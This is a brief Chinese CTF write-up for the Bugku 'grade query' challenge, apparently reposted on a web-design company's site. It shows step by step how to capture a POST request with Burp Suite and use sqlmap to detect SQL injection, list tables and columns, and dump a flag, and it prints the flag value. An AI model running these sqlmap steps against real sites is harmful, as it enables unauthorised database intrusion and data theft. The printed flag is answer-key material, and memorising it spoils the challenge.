bugku——成绩查询(sqlmap工具的使用)
2026/4/23 18:39:09 网站建设 项目流程

当输入1的时候会返回成绩

但是在URL中并没有出现GET传参,所以大概率是POST了。

需要用我们的工具sqlmap

在这之前,我们需要用Burp Suite抓包。

发送到重放器,右键,复制到文件

打开是这样的,好了主备工作完成,打开sqlmap

L:\gj\sqlmap>python sqlmap.py -r "1.txt"

他说目标接口id存在高危sql注入漏洞

可以注入我们就进行下一步,爆表

python sqlmap.py -r "1.txt" --tables

出来了数据库名和表名,继续爆列名。

ython sqlmap.py -r "1.txt" -D skctf -T fl4g --columns

得到列明了,提取数据

python sqlmap.py -r "1.txt" -D skctf -T fl4g -C skctf_flag --dump

flag{7bc17ff3453fef76f405bf3fb68cc9a9}

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询